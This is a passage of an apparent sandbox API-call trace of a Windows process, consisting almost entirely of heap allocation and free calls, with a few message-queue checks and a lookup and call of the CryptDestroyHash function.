hHeap=0x970000) returned 1 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0250.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0250.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0250.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0250.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0250.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0250.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0250.615] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0250.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0250.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0250.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0250.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0250.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0250.615] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0250.615] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.615] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0250.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0250.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0250.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0250.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0250.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0250.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0250.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0250.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0250.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517d8 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0250.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0250.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0250.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0250.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0250.618] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0250.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0250.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0250.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0250.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0250.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0250.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0250.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0250.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0250.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0250.656] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0250.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0250.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0250.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0250.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0250.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0250.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0250.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0250.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0250.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0250.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0250.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0250.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b28 [0250.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0250.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0250.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0250.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0250.657] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0250.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0250.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0250.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0250.658] CryptDestroyHash (hHash=0xa87390) returned 1 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0250.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0250.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0250.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: 